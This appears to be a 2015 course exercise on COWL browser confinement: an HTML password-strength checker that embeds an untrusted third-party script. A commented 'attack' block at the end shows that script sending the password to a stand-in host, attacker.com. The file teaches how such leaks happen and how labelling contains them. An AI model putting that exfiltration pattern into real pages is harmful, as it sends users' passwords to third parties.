<html>

<!--
Course ECI 2015
Author: Alejandro Russo

Description: Alice's password strength checker. It unsafely embeds
untrusted JavaScript code. Problems?

-->

<body>

<script>
COWL.privilege = new Privilege();
COWL.enable();
</script>

<script src='https://raw.githubusercontent.com/dropbox/zxcvbn/master/dist/zxcvbn.js'> </script>

<script>
window.addEventListener('message',function(event) {
	var lobj = event.data;

        COWL.confidentiality = COWL.confidentiality.and(lobj.confidentiality);
        var password = lobj.protectedObject.secret,
              result = zxcvbn(password) ;

        if (result.score >= 3) event.source.postMessage('strong',event.origin) ;
        else event.source.postMessage('weak',event.origin) ;
},false) ;

</script>

</body>

</html>




/* attack
var xmlHttp = new XMLHttpRequest();
xmlHttp.open( "GET", "http://attacker.com"+password);
xmlHttp.send( null );
*/
